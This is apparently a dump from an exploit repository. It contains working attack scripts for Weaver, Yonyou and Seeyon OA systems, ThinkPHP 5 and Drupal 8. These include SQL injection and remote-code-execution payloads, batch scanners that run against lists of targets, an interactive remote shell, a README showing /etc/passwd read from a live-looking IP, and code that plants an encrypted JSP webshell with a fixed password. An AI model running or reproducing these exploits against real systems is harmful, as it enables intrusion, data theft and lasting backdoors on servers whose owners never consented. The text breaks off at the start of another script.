12 | ''' 13 | 14 | 15 | 16 | def sql_test(url): 17 | headers = { 18 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 19 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 20 | 'Accept-Language': 'zh-CN,zh;q=0.9', 21 | 'Content-Type': 'application/x-www-form-urlencoded' 22 | } 23 | vul_url = url + '/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333' 24 | poc = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0
a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1" 25 | 26 | try: 27 | rsp = requests.post(url=vul_url, data=poc, headers=headers, verify=False, timeout=10) 28 | num = rsp.text 29 | sta = rsp.status_code 30 | if len(num)>1000 and sta == 200: 31 | if 'HOST' in num: 32 | success_sql.write(url + '\n') 33 | except Exception: 34 | pass 35 | 36 | def rce_test(target): 37 | headers = { 38 | 'Content-Type': 'text/xml; charset=utf-8', 39 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 40 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 41 | 'Cache-Control': 'max-age=0', 42 | 'Content-Type': 'application/x-www-form-urlencoded', 43 | 'Upgrade-Insecure-Requests': '1', 44 | 'Content-Length': '578' 45 | } 46 | 47 | url_list = {'url_1':'/bsh.servlet.BshServlet', 'url_2':'/weaver/bsh.servlet.BshServlet', 'url_3':'/weaveroa/bsh.servlet.BshServlet', 'url_4':'/oa/bsh.servlet.BshServlet'} 48 | 49 | payload = {'poc_1':'bsh.script=exec("whoami");&bsh.servlet.output=raw', 'poc_2':'bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.output=raw', 'poc_3':r'bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami'} 50 | 51 | 
for url in url_list: 52 | test_url = target + url_list[url] 53 | result = 0 54 | for i in payload: 55 | try: 56 | rsp = requests.post(url=test_url, data=payload[i], headers=headers, verify=False, timeout=5) 57 | sta = rsp.status_code 58 | num = rsp.text 59 | if sta == 200 and len(num) < 50: 60 | result = 1 61 | except Exception: 62 | pass 63 | if result == 1: 64 | success_rce.write(target + '\n') 65 | 66 | if __name__ == "__main__": 67 | success_sql = open("sql.txt",'a') 68 | success_rce = open("rce.txt", 'a') 69 | iplist = open (sys.argv[1], "r") 70 | for line in iplist: 71 | url = line.strip() 72 | sql_test(url) 73 | rce_test(url) 74 | success_sql.close() 75 | success_rce.close() 76 | print 'success!!!' 77 | -------------------------------------------------------------------------------- /thinkphp5/thinkphp5.0.x_RCE/tp5-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import optparse 4 | import threading 5 | import os 6 | import queue 7 | import datetime 8 | from requests.packages import urllib3 9 | 10 | headers={ 11 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0' 12 | } 13 | 14 | session=requests.session() 15 | 16 | lock=threading.Lock() 17 | 18 | q1=queue.Queue() 19 | 20 | command1='' 21 | 22 | threadlist=[] 23 | 24 | poclist=[ 25 | '/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1', 26 | '/index.php/?s=captcha' 27 | ] 28 | 29 | explist=[ 30 | '/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=', 31 | '/index.php/?s=captcha' 32 | ] 33 | 34 | pocdatalist=[ 35 | { 36 | '_method':'__construct', 37 | 'method':'get', 38 | 'filter':'call_user_func', 39 | 'get[]':'phpinfo' 40 | }, 41 | {'_method':'__construct', 42 | 'method':'get', 43 | 'filter':'call_user_func', 44 | 'server[REQUEST_METHOD]':'phpinfo' 45 | } 46 | ] 47 | 48 | 49 | def 
tp5_rce_check(url): 50 | succ=0 51 | result='' 52 | for poc in poclist: 53 | index=poclist.index(poc) 54 | tgurl=url+poc 55 | try: 56 | if index==0: 57 | r=session.get(tgurl,headers=headers,verify=False) 58 | result+=r.text 59 | else: 60 | for pocdata in pocdatalist: 61 | r=session.post(tgurl,headers=headers,data=pocdata,verify=False) 62 | result+=r.text 63 | if 'PHP Version' in result: 64 | succ+=1 65 | global pocindex 66 | pocindex=index 67 | break 68 | 69 | except: 70 | print('[!] Destination address cannot be connected') 71 | return False 72 | if succ==1: 73 | print('[+] Remote code execution vulnerability exists at the target address') 74 | return True 75 | else: 76 | print('[-] There is no remote code execution vulnerability in the target address') 77 | return False 78 | 79 | 80 | def tp5_rce_shell(url): 81 | 82 | while True: 83 | command=input("shell$") 84 | 85 | if command != "exit": 86 | 87 | if pocindex==0: 88 | shell=url+explist[0]+str(command) 89 | r=session.get(shell,headers=headers,verify=False) 90 | else: 91 | expdata={ 92 | '_method':'__construct', 93 | 'method':'get', 94 | 'filter':'system', 95 | 'get[]':command 96 | } 97 | tgurl=url+explist[pocindex] 98 | print(expdata) 99 | r=session.post(tgurl,headers=headers,data=expdata,verify=False) 100 | print(r.text) 101 | else: 102 | break 103 | 104 | def tp5_rce_file(file,threads=5): 105 | current_time=datetime.datetime.now().strftime('%Y%m%d%H%M%S') 106 | os.makedirs('./result/'+str(current_time)) 107 | file_succ=open('result/'+str(current_time)+'/'+'success.txt','w') 108 | urlfile=open(file) 109 | 110 | for url in urlfile: 111 | furl=url.strip() 112 | q1.put(furl) 113 | 114 | for thread in range(threads): 115 | t=threading.Thread(target=tp5_rce_batch,args=(file_succ,)) 116 | t.start() 117 | threadlist.append(t) 118 | 119 | for t in threadlist: 120 | t.join() 121 | 122 | print('*****Finished!*****') 123 | print('Results were saved in result/'+str(current_time)+'/') 124 | file_succ.close() 125 | 
urlfile.close() 126 | 127 | def tp5_rce_batch(file): 128 | urllib3.disable_warnings() 129 | 130 | while q1.empty()!=True: 131 | tgUrl=q1.get() 132 | result='' 133 | succ=0 134 | for poc in poclist: 135 | url=tgUrl+poc 136 | try: 137 | if poclist.index(poc)==0: 138 | r=session.get(url,headers=headers,verify=False) 139 | result+=r.text 140 | else: 141 | for pocdata in pocdatalist: 142 | r=session.post(url,headers=headers,data=pocdata,verify=False) 143 | result+=r.text 144 | if 'PHP Version' in result: 145 | succ+=1 146 | break 147 | except: 148 | continue 149 | 150 | if succ==1: 151 | print('{:<50}SUCCESS!'.format(tgUrl)) 152 | lock.acquire() 153 | file.write(tgUrl+'\n') 154 | lock.release() 155 | break 156 | else: 157 | print('{:<50}FIAL!'.format(tgUrl)) 158 | 159 | 160 | 161 | 162 | if __name__=='__main__': 163 | 164 | print(''' 165 | **************************************************** 166 | * thinkphp5 rce * 167 | * Coded by Longtao * 168 | **************************************************** 169 | ''') 170 | 171 | parser=optparse.OptionParser('python %prog ' +'-h (manual)',version='%prog v1.0') 172 | 173 | parser.add_option('-u', dest='tgUrl', type='string', help='single url') 174 | 175 | parser.add_option('-r', dest='tgUrlFile', type ='string', help='urls filepath[exploit default]') 176 | 177 | parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads') 178 | 179 | parser.add_option('--shell', dest='shell',action='store_true', help='cmd shell mode') 180 | 181 | (options,args)=parser.parse_args() 182 | 183 | tgUrl=options.tgUrl 184 | 185 | tgUrlFile=options.tgUrlFile 186 | 187 | threads=options.threads 188 | 189 | shell=options.shell 190 | 191 | if tgUrl: 192 | tp5_rce_check(tgUrl) 193 | if shell: 194 | tp5_rce_shell(tgUrl) 195 | 196 | elif tgUrlFile: 197 | tp5_rce_file(tgUrlFile,threads) 198 | 199 | else: 200 | print('[-] Error! 
example:tp5-rce.py -u http://xxx.com') 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | -------------------------------------------------------------------------------- /Drupal/CVE-2019-6340/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-6340 Drupal8's REST RCE, SA-CORE-2019-003 2 | 3 | ### 0x01 docker search CVE-2019-6340 4 | ``` 5 | NAME DESCRIPTION STARS OFFICIAL AUTOMATED 6 | knqyf263/cve-2019-6340 Environment for CVE-2019-6340 (Drupal) 0 7 | cved/cve-2019-6340 cve-2019-6340 0 8 | ``` 9 | ### 0x02 docker pull knqyf263/cve-2019-6340 10 | 11 | ``` 12 | Using default tag: latest 13 | latest: Pulling from knqyf263/cve-2019-6340 14 | 6ae821421a7d: Pull complete 15 | 08f3d19635b0: Pull complete 16 | dc8a54b8000b: Pull complete 17 | b2c1d103db99: Pull complete 18 | edfa752aa38a: Pull complete 19 | 583d37cbf2f0: Pull complete 20 | c7846a240c1d: Pull complete 21 | d8f9f0fd02fe: Pull complete 22 | 01d43e56770d: Pull complete 23 | dbe439e2caf9: Pull complete 24 | 3de30e1f5211: Pull complete 25 | 209dd35ef060: Pull complete 26 | 3d97847926b1: Pull complete 27 | d0da67360f39: Pull complete 28 | 30efc6ba9a1f: Pull complete 29 | a7bf83e4c4c3: Pull complete 30 | f4e7678b40a5: Pull complete 31 | 9c786cb4409c: Pull complete 32 | e2a8985b3b6b: Pull complete 33 | e6b727cd2f54: Pull complete 34 | afc99ae05ad1: Pull complete 35 | 5db8cf1431d4: Pull complete 36 | 7b90e0b5c074: Pull complete 37 | 6f123bc91ad7: Pull complete 38 | 00456a0879a4: Pull complete 39 | 5ee332aeb757: Pull complete 40 | 5a6951f3933f: Pull complete 41 | 6733bf98ddeb: Pull complete 42 | Digest: sha256:af74572eca0aa665507cb1dd536deb18ec1c17ac3ca5757b9cdf8f7adb174876 43 | Status: Downloaded newer image for knqyf263/cve-2019-6340:latest 44 | ``` 45 | ### 0x03 docker run -d -p80:80 --name jas502n knqyf263/cve-2019-6340 46 | 47 | `1ed1e2278904d06f5b8c5d5fda677b393e16414bbf0bd93f5d8f359d76360e49`</br> 48 | ![](./Drupal8.jpg) 49 | 50 | ### 0x04 python 
CVE-2019-6340.py url cmd 51 | `s:2:\"id\";` 52 | ![](./CVE-2019-6340.jpg) 53 | 54 | ``` 55 | python CVE-2019-6340.py http://47.75.157.227 "id" 56 | 57 | Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340 58 | 59 | Example: python CVE-2019-6340.py url cmd 60 | 61 | >>>Vuln Url=http://47.75.157.227/node/ 62 | 63 | >>>>Exit CVE-2019-6340 RCE Vuln! 64 | 65 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 66 | 67 | ``` 68 | 69 | ``` 70 | python CVE-2019-6340.py http://47.75.157.227 "cat /etc/passwd" 71 | 72 | Description: Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340 73 | 74 | Example: python CVE-2019-6340.py url cmd 75 | 76 | >>>Vuln Url=http://47.75.157.227/node/ 77 | 78 | >>>>Exit CVE-2019-6340 RCE Vuln! 79 | 80 | root:x:0:0:root:/root:/bin/bash 81 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 82 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 83 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 84 | sync:x:4:65534:sync:/bin:/bin/sync 85 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 86 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 87 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 88 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 89 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 90 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 91 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 92 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 93 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 94 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 95 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 96 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 97 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 98 | _apt:x:100:65534::/nonexistent:/bin/false 99 | 100 | ``` 101 | 102 | ##### burpsuite request 103 | ![](./CVE-2019-6340-burp.jpg) 104 | ``` 105 | POST /node/?_format=hal_json HTTP/1.1 106 | Host: 47.75.157.227 107 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) 
Gecko/20100101 Firefox/55.0 108 | Connection: keep-alive 109 | Content-Type: application/hal+json 110 | Accept: */* 111 | Cache-Control: no-cache 112 | Content-Length: 626 113 | 114 | { 115 | "link": [ 116 | { 117 | "value": "link", 118 | "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" 119 | } 120 | ], 121 | "_links": { 122 | "type": { 123 | "href": "http://localhost/rest/type/shortcut/default" 124 | } 125 | } 126 | } 127 | 128 | ``` 129 | ##### burpsuite response 130 | ``` 131 | HTTP/1.1 403 Forbidden 132 | Date: Mon, 27 May 2019 19:12:21 GMT 133 | Server: Apache/2.4.25 (Debian) 134 | X-Powered-By: PHP/7.2.15 135 | Cache-Control: must-revalidate, no-cache, private 136 | X-UA-Compatible: IE=edge 137 | Content-language: en 138 | X-Content-Type-Options: nosniff 139 | X-Frame-Options: SAMEORIGIN 140 | Expires: Sun, 19 Nov 1978 05:00:00 GMT 141 | Vary: 142 | X-Generator: Drupal 8 (https://www.drupal.org) 143 | Keep-Alive: timeout=5, max=100 144 | Connection: Keep-Alive 145 | Content-Type: application/hal+json 146 | Content-Length: 239 147 | 148 | {"message":"The shortcut set must be the currently displayed set for the user and the user must have \u0027access shortcuts\u0027 AND \u0027customize shortcut links\u0027 permissions."}uid=33(www-data) gid=33(www-data) groups=33(www-data) 149 | ``` 150 | ### 0x05 参考链接 151 | `https://github.com/knqyf263/CVE-2019-6340` </br> 152 | `https://www.ambionics.io/blog/drupal8-rce` </br> 153 | 
`https://gist.githubusercontent.com/theMiddleBlue/22c6908d955519bd23b3d0b349badcc5/raw/af5746d4755c9e4cca6d8ef15334f81027c524df/drupal8rce.json`</br> 154 | `https://www.drupal.org/sa-core-2019-003` 155 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/getshell_poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | import json 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | 10 | def title(): 11 | print('+----------------------------------------------------') 12 | print('+ \033[34mVersion: 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') 13 | print('+ \033[36m使用格式: python3 getshell_poc.py \033[0m') 14 | print('+ \033[36m文件名: url.txt \033[0m') 15 | print('+----------------------------------------------------') 16 | 17 | #随机ua 18 | def get_ua(): 19 | first_num = random.randint(55, 62) 20 | third_num = random.randint(0, 3200) 21 | fourth_num = random.randint(0, 140) 22 | os_type = [ 23 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 24 | '(Macintosh; Intel Mac OS X 10_12_6)' 25 | ] 26 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 27 | 28 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 29 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 30 | ) 31 | return ua 32 | 33 | 34 | def POC_1(url): 35 | vuln_url = url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)" 36 | try: 37 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 38 | response = requests.get(url=vuln_url, verify=False, timeout=15) 39 | if '序号' in response.text and "@@basedir" in response.text and response.status_code == 200: 40 | OA_dir = re.findall(r'>(.*)\\mysql\\', response.text)[0] 41 | OA_dir = OA_dir.replace("\\","/") 42 | print("\033[32m[+]目标 {} 存在SQL注入漏洞".format(url)) 43 | 
webshell_name = "update_{}.jsp".format(random.randint(1,5)) 44 | OA_dir = OA_dir + "/tomcat/webapps/yyoa/{}".format(webshell_name) 45 | POC_2(url, OA_dir, webshell_name) 46 | else: 47 | print("\033[31m[x]目标 {} 不存在SQL注入漏洞 \033[0m".format(url)) 48 | except Exception as e: 49 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(url), e) 50 | 51 | def POC_2(url, OA_dir, webshell_name): 52 | vuln_url = url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%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%27)%20%20into%20outfile%20%27{}%27".format(OA_dir) 53 | webshell_dir = url +"/yyoa/"+ webshell_name 54 | try: 55 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 56 | response = requests.get(url=vuln_url, verify=False, timeout=5) 57 | if 'already' in response.text and response.status_code == 200: 58 | print("\033[32m[+]文件写入木马上传失败,目标已存在相同文件,请重新运行\033[0m") 59 | elif "No Data" in response.text and response.status_code == 200: 60 | print("\033[32m[+]文件写入木马上传成功,上传路径为 {}\033[0m".format(webshell_dir)) 61 | print("\033[32m[+]请使用冰蝎连接,密码为: bxmm\033[0m") 62 | with open('webshell.txt', 'a', encoding='utf8') as vul: 63 | vul.write("请使用冰蝎连接,密码为: bxmm\nwebshell 地址:\n{} \n".format(webshell_dir)) 64 | else: 65 | print("\033[31m[x] 目标 {} 木马上传失败 \033[0m".format(url)) 66 | except Exception as e: 67 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(url), e) 68 | 69 | def Scan(file_name): 70 | header={"User-Agent": get_ua(),} 71 | with open(file_name, "r", encoding='utf8') as scan_url: 72 | for url in scan_url: 73 | if url[:4] != "http": 74 | url = "http://" + url 75 | url = url.strip('\n') 76 | try: 77 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 78 | httpError = False 79 | try: 80 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 81 | except Exception as e: 82 | httpError = True 83 | if not httpError and req.status_code == 200: 84 | print("\033[32m[+]正在请求{}".format(url)) 85 | else: 86 | url = 
url.replace("http","https") 87 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 88 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 89 | if req.status_code == 200: 90 | print("\033[32m[+]正在请求{}".format(url)) 91 | else: 92 | pass 93 | except Exception as e: 94 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 95 | else: 96 | pass 97 | try: 98 | POC_1(url) 99 | 100 | except Exception as e: 101 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 102 | continue 103 | 104 | if __name__ == '__main__': 105 | title() 106 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 107 | Scan(file_name) 108 | -------------------------------------------------------------------------------- /seeyon/致远OA_Session泄露_任意文件上传漏洞/exp.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import time 3 | import datetime 4 | import zipfile 5 | import random 6 | import string 7 | import requests 8 | import re 9 | import os 10 | 11 | requests.packages.urllib3.disable_warnings() 12 | 13 | def title(): 14 | print('+---------------------------------------------------') 15 | print('+ \033[34mVersion: 致远OA Session泄露 任意文件上传漏洞 \033[0m') 16 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 17 | print('+ \033[36murl: http://xxx.xxx.xxx.xxx \033[0m') 18 | print('+---------------------------------------------------') 19 | 20 | #随机ua 21 | def get_ua(): 22 | first_num = random.randint(55, 62) 23 | third_num = random.randint(0, 3200) 24 | fourth_num = random.randint(0, 140) 25 | os_type = [ 26 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 27 | '(Macintosh; Intel Mac OS X 10_12_6)' 28 | ] 29 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 30 | 31 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 32 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 33 | ) 34 | return ua 35 | 36 | def check_file(): 37 | path = os.getcwd() 38 | 
file_path = os.path.join(path,"payload.zip") 39 | if os.path.exists(file_path): 40 | os.remove(file_path) 41 | 42 | 43 | def write_zipfile(fname, content): 44 | with zipfile.ZipFile( 45 | 'payload.zip', 46 | mode='a', 47 | compression=zipfile.ZIP_DEFLATED, 48 | ) as zf: 49 | zf.writestr('layout.xml', "") 50 | zf.writestr(fname, content) 51 | 52 | 53 | 54 | def rand_str(num): 55 | ran_str = ''.join(random.sample(string.ascii_letters + string.digits, num)) 56 | return ran_str 57 | 58 | def get_cookie(targeturl): 59 | headers = {'User-Agent': get_ua(),'Content-Type': 'application/x-www-form-urlencoded'} 60 | url = '{targeturl}/seeyon/thirdpartyController.do'.format(targeturl=targeturl) 61 | post="method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1".encode("utf-8") 62 | try: 63 | response = requests.post(url=url,data=post,headers=headers, timeout=60,verify=False) 64 | if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower(): 65 | cookies = response.cookies 66 | cookies = requests.utils.dict_from_cookiejar(cookies) 67 | jsessionid = cookies['JSESSIONID'] 68 | return jsessionid 69 | else: 70 | exit() 71 | except: 72 | pass 73 | 74 | 75 | def upload_zip(targeturl,cookie): 76 | url = '{targeturl}/seeyon/fileUpload.do?method=processUpload'.format(targeturl=targeturl) 77 | files = [('file1', ('11.png', open('payload.zip', 'rb'), 'application/octet-stream'))] 78 | headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': get_ua()} 79 | post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0', 80 | 'isEncrypt': "0"} 81 | try: 82 | response = requests.post(url=url,files=files,data=post, headers=headers,timeout=60,verify=False) 83 | if response and response.status_code == 200 and 'fileurls=' in response.text: 84 | fileid = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I) 85 | if len(fileid) > 
0: 86 | return fileid[0] 87 | print("\033[32m[+]目标 {} 正在上传压缩包文件.... \n[+] Cookie: {} \033[0m".format(targeturl,cookie)) 88 | else: 89 | exit() 90 | except: 91 | pass 92 | 93 | def extract_file(targeturl,cookie,fileid): 94 | url = '{targeturl}/seeyon/ajax.do'.format(targeturl=targeturl) 95 | headers = {'Cookie':'JSESSIONID={cookie}'.format(cookie=cookie),'User-Agent': get_ua(), 'Content-Type':'application/x-www-form-urlencoded'} 96 | datestr = time.strftime('%Y-%m-%d') 97 | post = f'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22{datestr}%22%2C%22{fileid}%22%5D' 98 | try: 99 | response = requests.post(url, data=post,headers=headers,timeout=60,verify=False) 100 | if response.status_code == 500 and "Error" in response.text: 101 | print("\033[32m[+]目标 {} 解压文件成功.... \033[0m".format(targeturl)) 102 | return True 103 | else: 104 | print("\033[31m[x]目标 {} 解压文件失败.... \033[0m".format(targeturl)) 105 | exit() 106 | except Exception as e: 107 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url),e) 108 | 109 | def main(targeturl): 110 | fname = f'../{rand_str(8)}.jsp' 111 | shell = r'<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="5823cd3093f16f3b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 112 | check_file() 113 | write_zipfile(fname,shell) 114 | cookie = get_cookie(targeturl) 115 | fileid = upload_zip(targeturl, cookie) 116 | if extract_file(targeturl, cookie, fileid): 117 | url = targeturl + '/seeyon/common/designer/pageLayout/{fname}'.format(fname=fname.split('/')[1]) 118 | 
print("\033[32m[+]目标 {} 被上传冰蝎木马: {}\033[0m".format(targeturl, url)) 119 | print("\033[32m[+]冰蝎密码: bxmm \033[0m".format(targeturl)) 120 | else: 121 | print("\033[31m[x]目标 {} 不存在漏洞 \033[0m".format(targeturl)) 122 | 123 | if __name__ == '__main__': 124 | title() 125 | targeturl = str(input("\033[35m请输入需要检测的url:\033[0m")) 126 | main(targeturl) 127 | 128 | -------------------------------------------------------------------------------- /seeyon/致远OA_Session泄露_任意文件上传漏洞/poc.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import time 3 | import datetime 4 | import zipfile 5 | import random 6 | import string 7 | import requests 8 | import re 9 | import os 10 | 11 | requests.packages.urllib3.disable_warnings() 12 | 13 | def title(): 14 | print('+---------------------------------------------------') 15 | 